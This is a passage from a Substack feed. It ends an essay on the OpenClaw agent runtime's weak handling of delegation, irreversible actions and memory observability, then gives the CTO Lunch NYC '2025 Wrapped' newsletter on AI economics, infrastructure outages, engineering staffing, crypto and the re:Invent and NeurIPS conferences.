not just task allocation but transfer of authority, responsibility, and accountability,  with dynamic trust calibration, verifiable task completion, an <em>authority gradient</em> between delegator and delegatee, and what they call the <em>zone of indifference</em>: the range of instructions a delegatee executes without critical deliberation. As delegation chains lengthen, a broad zone of indifference allows subtle intent mismatches to propagate downstream, each agent acting as an unthinking router rather than a responsible actor. </p><p>This is a precise description of OpenClaw&#8217;s multi-agent routing at its current maturity with its deterministic bindings rules and policy cascade correctness, while the lane queue prevents races (via event serialization, not state reduction.) What&#8217;s absent is any mechanism for an agent to challenge the delegation it received, assess whether the task is appropriately scoped to its capabilities, or escalate based on contextual ambiguity. The system routes, but doesn&#8217;t reason about routing. This is not a criticism unique to OpenClaw but rather the current SOTA for open-source agent runtimes. But it is worth naming precisely, because the zone of indifference widens with every agent added to the cluster, and the MEMORY.md files accumulating beliefs across agents have no mechanism to surface the reasoning chains that produced them.</p><p>Irreversibility is the architectural primitive the framework names but OpenClaw doesn&#8217;t defend against. An inference call commits to a token distribution; the alternatives are gone. A policy cascade suppresses a tool; the reasoning is unrecoverable. MEMORY.md compresses a trace into a belief; the original is discarded. A message sent cannot be unsent. Once executed the original values are unrecoverable. </p><p>Reversible tasks OTOH (eg drafts, local operations, sandboxed execution) can be undone. Irreversible tasks (incl. external API calls and filesystem writes visible to other processes) cannot. <strong>The distinction defines an authority gradient</strong>: stricter verification, higher thresholds, human-in-the-loop checkpoints before crossing the line from reversible to irreversible. OpenClaw&#8217;s sandbox boundary is the only mechanism that approximates this. (It&#8217;s opt-in. YOLO is the default.) There is no built-in gradient between drafting a message and sending it, between testing a command and executing it, between simulating an action and committing it to the world.</p><p>The fundamental problem is an agent with the authority to perform irreversible actions <em>and no mechanism to distinguish them from reversible ones</em>. Bitsight found over 30,000 exposed OpenClaw Gateway instances in a two-week window: ports open to the internet, API keys readable. [<strong>Protip</strong>: the system often defaults to trusting 127.0.0.1, but you might be surprised (or not) how many users accidentally bind the gateway to 0.0.0.0. Whoopsie.] The quiet part is ofc YOLO-by-default at population scale.</p><p>MIT&#8239;CSAIL&#8217;s EnCompass, presented as a poster at NeurIPS&#8239; in December, approaches the reversibility problem from the execution side. By treating the agent execution graph as a first-class object, non-linearly traversable with backtracking, parallel sampling and beam search all as separable concerns from the workflow logic itself,   EnCompass recovers the optionality that inference-time commitment destroys. </p><p>The theoretical move is identical to the shift between ELT and ETL: preserve the atomic substrate, make the interpretation disposable and regenerable. An inference call, like a premature transform, is a one-way valve. Once you&#8217;ve committed to that token distribution, the state that preceded it is gone unless you explicitly preserved it. EnCompass pushes the valve further down the stack; OpenClaw has no surface for this concept. When an agent in a cluster makes a bad decision, the JSONL transcript records the outcome. The execution state that produced it is gone. The MEMORY.md records a belief derived from it. The belief propagates into the next session. The reasoning trace that would let you audit the belief was never captured and cannot be reconstructed.</p><div class="pullquote"><p>While technically not technical debt in the Sculley sense (accumulated complexity you&#8217;ll eventually refactor), it accrues in a different ledger. That ledger gets its own post.</p></div><h3><strong>Seen and Unseen</strong></h3><p><strong>OpenClaw delivers on its opening promise at the transport layer.</strong> The Gateway shows its work. The configuration is declarative and inspectable. The install experience is exactly what it claims to be. </p><p>But the map begins to fray at the orchestration layer, where silent failures on suppressed tool calls leave no trace of the suppression. It peels further at the execution layer, where outcomes are recorded and mechanisms are not. By the time we reach the memory layer, where the reasoning that produced a belief is compressed into the belief itself and the original discarded, it&#8217;s in tatters. </p><p><a href="https://courses.cit.cornell.edu/econ6100/Borges.pdf">Borges&#8217; kingdom</a> is Floridi&#8217;s conjecture, not as theory but as architecture. Pi sat at the high-certainty, low-scope end of the hyperbola: a coding collab agent for 1 dev x 4 tools, that was legible all the way down. By moving the operating point (more channels, more agents, more users, more scope) OpenClaw opens a debt position with the conjecture. Each capability addition was a rational local decision but the collective result is a system whose observability model was designed for the territory it started from, not the territory it became. Not even larger, just different. </p><p>Furman&#8217;s markdown file is still there. The capability contract still works. The agent can still read the territory directly, tool by tool, README by README, without an app store intermediating. (And what is an app store but a manifest with a judging committee?) That insight survives but what doesn&#8217;t survive, at scale, is the certainty that what you&#8217;re seeing is what&#8217;s actually happening. At a sufficient scale the disconnect is disastrous, a festival of nuclear footguns.</p><p>Mario Zechner built Pi around a single conviction: that you should be able to see the machine working. OpenClaw inherited that conviction&#8212;sincerely, one believes&#8212;and then grew faster than it could follow. The terminal still shows you the brain (er, ganglia) connecting to your environment on install. In Gateway Mode, it&#8217;s still there, albeit unseen. At a certain depth the sun&#8217;s light just can&#8217;t penetrate to the ocean floor  to illuminate all the crustaceans scuttling there. </p><div><hr></div><p>Somewhere in the cluster, an agent is reasoning. You can see <em>what</em> it decided. You can read <em>what</em> it remembered. You just have not idea <em>how</em> it got there.</p><p>This gap has no name. It&#8217;ll get one in a future post.</p><p><em>Forest Mars is a NYC based CTO who smh finds time to write about architecture, AI, and the things your infrastructure is hiding from you, as well as how to <a href="/__u/buildai.substack.com/">build AI at scale</a>. </em></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="/__u/substackcdn.com/image/fetch/$s_!l49I!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="/__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_webp, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 1456w" sizes="100vw"><img src="/__u/substackcdn.com/image/fetch/$s_!l49I!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg" width="1200" height="800" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:800,&quot;width&quot;:1200,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:197588,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/jpeg&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://forestmars.substack.com/i/188296231?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="/__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_424, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 424w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_848, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 848w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_1272, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 1272w, /__u/substackcdn.com/image/fetch/$s_!l49I!, /__u/ctolunchnyc.substack.com/w_1456, /__u/ctolunchnyc.substack.com/c_limit, /__u/ctolunchnyc.substack.com/f_auto, /__u/ctolunchnyc.substack.com/q_auto:good, /__u/ctolunchnyc.substack.com/fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1e860125-e078-43fa-ac27-75ccd55daa70_1200x800.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg aria-hidden="true" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h4><strong>References</strong></h4><p>Floridi, L. et al. (2025). A Conjecture on a Fundamental Trade-Off between Certainty and Scope in Symbolic and Generative AI. arXiv:2506.10130.</p><p>Li, Z. et al. (2025). EnCompass: Separating Workflow Logic from Inference-Time Search in LLM Agents. NeurIPS 2025.</p><p>Sculley, D. et al. (2015). Hidden Technical Debt in Machine Learning Systems. NeurIPS 2015.</p><p>Toma&#353;ev, N., Franklin, M., &amp; Osindero, S. (Feb 12, 2026). Intelligent AI Delegation. arXiv:2602.11865.</p><p>Zechner, M. (2025). What I learned building an opinionated and minimal coding agent. mariozechner.at.</p><p><a href="https://x.com/Shaun__Furman/">Shaun Furman on X:  &#8220;I&#8217;ve now been running Openclaw on this Rabbit for around 36 hours&#8221;</a></p><p><br></p>]]></content:encoded></item><item><title><![CDATA[CTO Lunch NYC 2025 Wrapped]]></title><description><![CDATA[Tech Roundup for CTOs]]></description><link>https://ctolunchnyc.substack.com/p/cto-lunch-nyc-december-2025</link><guid isPermaLink="false">https://ctolunchnyc.substack.com/p/cto-lunch-nyc-december-2025</guid><dc:creator><![CDATA[Forest Mars]]></dc:creator><pubDate>Mon, 08 Dec 2025 13:03:16 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/eec4ad3d-d1fd-4033-a10e-06606baeba1f_1248x832.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>We started the year talking about escape velocity and ended it measuring blast radius.</p><p>A year ago, the consensus was that AI would automate infrastructure, accelerate development, and finally solve the hiring problem. Twelve months later, we&#8217;re debugging why agents can&#8217;t navigate our service boundaries, measuring a 39-point gap between perceived and actual productivity gains, and asking what a senior engineer even does when the junior dev is Claude Code. The models got better. The infrastructure bent under load. And sometimes broke.</p><p>January&#8217;s question was simple: which models do we bet on? By March the answer had become obsolete; every month brought another frontier model, another leaderboard reshuffling, another procurement decision invalidated before the contract cleared legal. The wider arc was revealed by contradicting headlines: model pricing wars making switching costs approach zero; 95% of enterprise AI pilots failed for architectural reasons. <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-october-2025?open=false#%C2%A7sloppy-she-said-sloppy:~:text=%2413.5%20billion%20in%20loss">OpenAI setting $13.5B on fire</a> (in six months) while Qwen matched frontier performance on a single GPU before Alibaba signaled it would stop releasing open weights for its Max-class models.  <a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound#:~:text=Three%20weeks%2C%20three%20Tier%201%20infrastructure%20providers%2C%20three%20internal%20glitches">Three Tier 1 provider outages in three weeks</a> proving we&#8217;d traded resilience for convenience, while Microsoft and Apple both promised agentic substrates <a href="/__u/ctolunchnyc.substack.com/i/178040240/the-ai-rloveution">neither had actually shipped</a>. The narrative was transformation. The reality was discovering we&#8217;ve optimized systems not fit for the stressors we need them to support, and that <em>research is catching up.</em></p><p><strong>Conversations at our monthly lunches traced this journey</strong> from optimism to operational reality. Early in the year: integration strategies, vendor selection, pilot programs. Mid-year: why the pilots aren&#8217;t graduating to production, how to measure what&#8217;s actually working, <a href="/__u/ctolunchnyc.substack.com/i/167693028/supply-chains-under-attack">supply chain attacks</a> including <a href="/__u/ctolunchnyc.substack.com/i/167693028/a-critical-mcp-vulnerability">MCP servers</a>. By fall: existential questions about team composition, <a href="/__u/ctolunchnyc.substack.com/i/172508903/sdlc-convergence">architectural maturity</a>, and what the CTO role even means when you&#8217;re responsible for everything AI-adjacent but the org chart hasn&#8217;t caught up. At our October <a href="/__u/ctolunchnyc.substack.com/p/the-great-ai-replacement#:~:text=What%20does%20an%20engineer%20even%20do%20in%2018%20months">lunch</a>, someone asked *what does an engineer even do in 18 months?* By December the question is more like: what does a CTO actually do in 12?</p><p>Some companies are creating Chief AI Officer roles to handle this. Others are promoting VPs of Engineering to CTO while the CTO becomes something else. A third group is hiring &#8220;AI strategy&#8221; consultants who&#8217;ve never shipped production code. And a fourth is watching their CTO quietly become responsible for everything AI-adjacent because someone has to own it and nobody else will take on the exposure. The fifth column is, of course, AI focused fractional CTOs.</p><p>This is the year we all became CAIOs, whether the org chart reflects it or not. Responsible not just for technology strategy but for navigating a value chain where <a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money">only Tier 1 makes money,</a> securing systems against <a href="/__u/ctolunchnyc.substack.com/p/no-time-to-spy">threats vendors can&#8217;t define</a>, measuring <a href="/__u/ctolunchnyc.substack.com/p/cto-lunch-october-2025#:~:text=The%20gap%20between%20perceived%20productivity%20(%2B20%25)%20and%20actual%20productivity">productivity gaps between perception and reality</a>, architecting for <a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound">infrastructure failures we can&#8217;t predict</a>, and explaining to the CFO why that crypto position is actually <a href="/__u/ctolunchnyc.substack.com/i/180771917/coupled-risk-ai-on-the-blockchain">collateral for AI speculation</a>. </p><blockquote><p>The year that promised transformation delivered fragmentation and a job description nobody wrote down but everyone&#8217;s expected to execute.</p></blockquote><p>Welcome to the CAIO era. The role you didn&#8217;t apply for but got anyway. <br>In addition to your normal holiday bonus.</p><div class="preformatted-block" data-component-name="PreformattedTextBlockToDOM"><label class="hide-text" contenteditable="false">Text within this block will maintain its original spacing when published</label><pre class="text">                                                                        &#9731;&#65038;</pre></div><p><em>Our monthly newsletters are beasts, written for CTOs who stay with the trouble; hard problems that shape a given year in technology more than those looking for quick answers. They have a table-of-contents, but still can be daunting.  For this our final newsletter of 2025 we&#8217;re changing it up with a new <strong>ADHD friendly format</strong>, which breaks each issue into standalone posts. The topics demand depth that&#8217;s hard to compress, but you shouldn&#8217;t need Adderall to get through them.</em></p><div class="pullquote"><p>IN THIS ISSUE<br><a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money">Turning Sand Into Money</a><br><a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound">Infra Penny, Infra Pound</a><br><a href="/__u/ctolunchnyc.substack.com/p/the-great-ai-replacement">The Great (AI) Replacement</a><br><a href="/__u/ctolunchnyc.substack.com/p/no-time-to-spy">No Time To Spy</a><br><a href="/__u/ctolunchnyc.substack.com/p/web3-wonderland">Web3 Wonderland</a><br><a href="/__u/ctolunchnyc.substack.com/i/180772411/reinventing-the-future">Reinventing The Future</a></p></div><h2>Turning Sand Into Money</h2><h5>Why the Cost of Beached Assets Will Implode the 5:1 Capex-to-Revenue Ratio.<br></h5><p><strong>The AI economy begins with sand.</strong> TSMC takes silicon dioxide, literally beach sand, and through $20 billion fabrication plants transforms it into chips worth 10,000x the raw material cost. Nvidia takes those chips and turns them into H100 GPUs selling for $30,000 apiece. Microsoft takes those GPUs and rents them by the hour at 80% gross margins. OpenAI takes that compute and burns it training models they sell through APIs at a loss. And somewhere, theoretically, an enterprise customer takes that API access and builds an application that generates actual economic value.</p><p>This is the five-tier value chain of AI:</p><p><code>silicon &#8594; GPUs &#8594; cloud &#8594; models &#8594; applications</code></p><p>In a functioning market, each tier captures margin by adding differentiation. In the AI market, only Tier 1 is making money. Everything else is playing hot potato with credit lines, hoping the music doesn&#8217;t stop before the applications tier materializes.</p><p><a href="http://.">Tier 2 reveals the structural problem when you strip away the narrative.</a>  [read more]</p><h2>Infra Penny, Infra Pound</h2><h5>(How) Trading Resilience for Convenience Created the Autonomous Architecture Mandate<br></h5><p><strong>On November 18, 20% of the global web went dark for three hours</strong>. Not from a cyberattack. Not from physical infrastructure failure. A single <code>.unwrap()</code> call in Cloudflare&#8217;s Rust codebase brought down X, OpenAI, Discord, and critical infrastructure across five continents. The trigger was a database permission change. The catalyst was a SQL query missing a WHERE clause, returning double the expected data. The crash was a hard-coded limit in a panicky edge worker that didn&#8217;t degrade gracefully.</p><div class="pullquote"><p><strong>The Internet was designed to survive a nuclear fallout. <br>On November 18, 2025, it couldn&#8217;t survive a missing where clause.*</strong></p></div><p><em>(*this is actually just a <a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound#:~:text=the%20Internet%20wasn%E2%80%99t%20designed%20to%20survive%20a%20nuclear%20incident">myth</a>.)</em> </p><p>We&#8217;ve built a world where the smallest operational decision can have the biggest operational blast radius. Not because the failures were exotic. Not because a nation-state attacker slipped through a zero-day. But because of something much harder to defend against: routine changes traveling through systems that are no longer routine. You saved pennies by outsourcing infrastructure to hyperscale providers. Now you&#8217;re in for a pound when their cascading failures take down your entire operation and takes a big bite of revenue.</p><p>CTOs need architectural patterns <a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound">that follow through when dependencies fail, which means&#8230;</a>  [read more]</p><h2>The Great (AI) Replacement</h2><h5>I saw the best devs of my generation destroyed by agents, prompting hysterical replaced<br></h5><p><strong>Some few dozen CTOs from NYC&#8217;s biggest and most technology focused companies</strong> recently gathered for a city-wide luncheon. They weren&#8217;t debating LLM architectures or which agentic framework was hottest this week. They definitely weren&#8217;t discussing model benchmarks or token economics. They were talking about headcount, hiring, and more quietly, AI-related existential questions asked out loud, such as, <em>What does an engineer even do in 18 months, and how do you hire for that?</em></p><p>The room was full of people who&#8217;ve already made their AI bets. Teams running with Copilot, engineering orgs experimenting with agents, departments deep into pilots that were supposed to be in production longer ago than anyone cared to admit. The question has long since moved past how <em>much</em> AI to adopt. What was being asked is what adoption means for the shape of engineering itself, and how you staff for a future you can&#8217;t predict, on planning cycles that require you do so.</p><p>The Great AI Replacement isn&#8217;t happening the way the hype promised. <a href="/__u/ctolunchnyc.substack.com/p/the-great-ai-replacement">AI isn&#8217;t replacing developers; it&#8217;s replacing&#8230;</a>  [read more] </p><div class="digest-post-embed" data-attrs="{&quot;nodeId&quot;:&quot;c17a3496-d183-4a71-8ddf-d7224b162542&quot;,&quot;caption&quot;:&quot;Anthropic published a blog post this month titled &#8220;Disrupting AI-powered espionage&#8221; that manages to be simultaneously alarming and completely uninformative. The central claim: &#8220;advanced AI systems&#8221; with &#8220;agentic capabilities&#8221; create new espionage risks. The proposed solution: refusing certain requests and monitoring for &#8220;misuse patterns.&#8221; If this sounds&#8230;&quot;,&quot;cta&quot;:&quot;Read full story&quot;,&quot;showBylines&quot;:true,&quot;showDescription&quot;:true,&quot;showImage&quot;:true,&quot;size&quot;:&quot;lg&quot;,&quot;isEditorNode&quot;:true,&quot;title&quot;:&quot;No Time To Spy &quot;,&quot;publishedBylines&quot;:[{&quot;id&quot;:385684227,&quot;name&quot;:&quot;Forest Mars&quot;,&quot;bio&quot;:&quot;Currently doing something. (Of that you can be sure.) &quot;,&quot;photo_url&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bbba0c88-fa1e-4880-9aa7-a190063e4126_400x400.jpeg&quot;,&quot;is_guest&quot;:false,&quot;bestseller_tier&quot;:null}],&quot;post_date&quot;:&quot;2025-12-04T13:01:13.537Z&quot;,&quot;cover_image&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0b9ad7a0-d108-45aa-8976-79699bb9d389_1248x832.png&quot;,&quot;cover_image_alt&quot;:null,&quot;canonical_url&quot;:&quot;https://ctolunchnyc.substack.com/p/no-time-to-spy&quot;,&quot;section_name&quot;:null,&quot;video_upload_id&quot;:null,&quot;id&quot;:178837808,&quot;type&quot;:&quot;newsletter&quot;,&quot;reaction_count&quot;:3,&quot;comment_count&quot;:0,&quot;publication_id&quot;:4903171,&quot;publication_name&quot;:&quot;CTO Lunch NYC&quot;,&quot;publication_logo_url&quot;:&quot;&quot;,&quot;belowTheFold&quot;:true,&quot;youtube_url&quot;:null,&quot;show_links&quot;:null,&quot;feed_url&quot;:null}"></div><h2>Web3 Wonderland</h2><h5>What November&#8217;s collapse revealed about liquidity, and the cold<br></h5><p><strong>The frost set in fast.</strong> <em>Here in NYC we had one of the earliest frosts in the last 25 years</em>, which almost seems like a harbinger in hindsight: November 2025 was a stress test in real time. It looked like classic macro spillover: stocks up, bonds flat, VIX spiked 11%, climbing past 27. S&amp;P 500&#8217;s P/E ratio didn&#8217;t budge (all year.) Treasury yields held. Equities traded sideways. Then, there was Bitcoin, which dropped $40,000 in 45 days. &#127906; From $126,000 to $89,000, a trillion dollars evaporated across crypto markets; some instruments more than 80% of their nominal value. The collapse was surgical, isolated to the speculative frontier: crypto and AI infrastructure, twin pillars of &#8220;future tech&#8221; both suddenly repriced as if someone had turned off the heat.  But who? </p><p>To understand why this drawdown was so severe, we need to zoom in on <a href="/__u/ctolunchnyc.substack.com/p/web3-wonderland">how AI and crypto have become structurally coupled. But first, let&#8217;s</a> [read more]</p><h2>Reinventing The Future</h2><p>Can someone please explain why AWS re:invent and NeurIPS have to be scheduled for the same week? It&#8217;s a plot to make you choose between data science and data engineering, between operational infrastructure updates and cutting-edge research. I mean, <em><a href="/__u/buildai.substack.com/">who needs</a></em> to understand both how AI models work AND how to actually deploy them at scale?</p><p>At <strong>re:invent</strong> (which closed with Vogels&#8217; final keynote &#8220;ever&#8221;), Lambda <em>finally</em> added multi-concurrency support with Lambda Managed Instances. Each execution environment can now process multiple requests rather than spinning up separate environments for each invocation (which is a <a href="/__u/ctolunchnyc.substack.com/i/177400881/the-control-plane-vs-data-plane-distinction-that-will-save-your-job">control plane anti-pattern</a>) enabling code shared resources across concurrent requests. Strange that durable functions support was added to CloudFormation but not managed instances; it&#8217;s almost as if different teams shipped features without coordinating. Fine print: GPU support is still unclear. And while the CreateFunction API lets you choose managed instances, AWS::Lambda::Function in CloudFormation doesn&#8217;t. You have to use SAM&#8217;s AWS::Serverless::Function and AWS::Serverless::CapacityProvider instead. </p><p>Database Savings Plans (DSP)  finally giving RDS and Aurora the same reserved capacity pricing model EC2 has had for years. If you&#8217;re running production databases on AWS and weren&#8217;t already gaming Reserved Instances, this should save 20-40% on steady-state workloads. If you were gaming Reserved Instances, this is mostly repackaging with better flexibility. Nearly every DSP case study, and at least every other presentation covered complex, autonomous, or semi&#8209;autonomous agent workflows. AWS is betting that agentic AI becomes the default development paradigm, which means their service roadmap is optimizing for orchestration, state management, and guardrails rather than raw model access. RIP Nova. But if your architecture still treats LLMs as stateless API calls, you&#8217;re building for 2023&#8217;s problems.</p><p>Meanwhile (literally) at <strong>NeurIPS</strong>, the problems of 2027 are already taking shape. <br>Large-scale agent frameworks, multimodal reasoning, and energy-conscious training techniques all promise performance at a fraction of compute. Artificial Hivemind was dominating conversations before even winning best poster on the DB track, for showing why different LLMs, even from separate labs, tend to produce nearly identical outputs. I mean apart from, you know, statistics. Or the fact that all these labs are reading from the same giant crib sheet. Basically, the hive is implementing a distributed Kalman filter for cultural drift. Another entrant in the &#8220;of course&#8221; category, <em>The Universal Weight Subspace Hypothesis</em> (which went up on <a href="https://arxiv.org/abs/2512.05117">Arxiv</a> in the Friday NeurIPS rush) showed weight spaces collapse into the same low-dimensional &#8220;universal&#8221; subspace, which is somehow even funnier. </p><p>Energy efficient AI innovation was a <em>hot</em> topic, putting energy costs in perspective with real numbers. (Related: Alistair Alexander&#8217;s recent <a href="https://www.linkedin.com/feed/update/urn:li:activity:7401604891346997252/">estimation</a> that creating one 10-second AI video on Sora uses 1 kw-hour, 10% of a German household&#8217;s daily energy consumption, equivalent to watching 5.5 hours of Netflix.) Another thing that&#8217;s gootten remarkably efficient is NeurIPS paper submissions, growing from 9k submitted in 2022 to over 25k submitted this year. I can&#8217;t imagine why that&#8217;s happening. Several of this year&#8217;s top papers showed that architectural tweaks (like gated attention) and deep-but-stable training regimes (viz. 1,000-layer RL networks) can deliver outsized gains without the usual scaling tax. Papers on AI-assisted software development offered glimpses at pipelines for code synthesis, testing and deployment; translating these innovations into production-ready systems, which is is non-trivial, has a rough market cadence with POCs appearing in the 3-6 month range, 6&#8211;18 months to integrate a feature reliably into internal systems, and 12&#8211;24 months to ship it in a customer-facing product. </p><p>The conference overlap forces you to declare what you&#8217;re optimising for: vendor roadmaps or competitive differentiation. re:Invent is still bigger bc it&#8217;s immediately actionable: new services you can deploy next quarter. NeurIPS is 1/4 the size of re:Invent (1/3 including virtual attendees) bc the research won&#8217;t be productized until 2027. The gap between them is whether you&#8217;re building infrastructure flexible enough to absorb what&#8217;s coming w/o requiring a rewrite when the research becomes product.</p><h2><strong>2025 Tech Wrapped</strong></h2><p>In 2025 the models improved faster than (almost) anyone predicted, SOTA FLOP grew 100x, pricing collapsed, Ilya announced the end of scaling, and open-source alternatives matched frontier performance on consumer hardware. What these much lauded advancements mean when model benchmarks have basically become an object lesson in Goodhart&#8217;s law, is another question entirely. But CTOs weren&#8217;t struggling with model capabilities. Rather, architectural maturity, measurement systems designed for human-written code, security frameworks that couldn&#8217;t define the threats they were supposed to prevent, and infrastructure so centralized that routine changes triggered existential failures: these were the real, operationally salient challenges this year. The technology worked. The systems we built around it didn&#8217;t.</p><p>Our roles changed faster than our titles. What started as &#8220;integrate AI into our stack&#8221; became &#8220;navigate a value chain where only Tier 1 makes money,&#8221; then &#8220;measure productivity when developers spend more time reviewing AI output than writing code,&#8221; then &#8220;architect for agents we don&#8217;t fully trust operating on infrastructure we can&#8217;t control,&#8221; and finally &#8220;explain to the board why we need a Chief AI Officer.&#8221; Some organizations created new roles. Most just watched their CTO absorb everything AI-adjacent because someone has to own it and nobody else wants the liability. </p><p>The through-line across every layer this month: <a href="/__u/ctolunchnyc.substack.com/p/turning-sand-into-money">tier economics</a>, <a href="/__u/ctolunchnyc.substack.com/p/infra-penny-infra-pound">infrastructure fragility</a>, <a href="/__u/ctolunchnyc.substack.com/p/the-great-ai-replacement">workforce transformation</a>, <a href="/__u/ctolunchnyc.substack.com/p/no-time-to-spy">security theater</a>, and <a href="/__u/ctolunchnyc.substack.com/p/web3-wonderland">crypto&#8217;s liquidity test</a> is identical: we optimized for velocity and built systems not fit for operating under stress. Dromology describes the boundary where this speed meets indeterminism.  When the music skips a beat, the architecture reveals what it was really built for. Not resilience. Not sustainability. Performance under optimal conditions with the assumption that optimal conditions would continue. The breaking of this assumption will demarcate where the CAIO era began. </p><p>That&#8217;s all for this month. And this year. See everyone at lunch. <br><br>And Happy Code Freeze, to those who celebrate!<br><br>Forest Mars<br>&#10052;&#65039;&#127938;&#10052;&#65039;&#127938;&#10052;&#65039;</p><div class="pullquote"><p><em>This 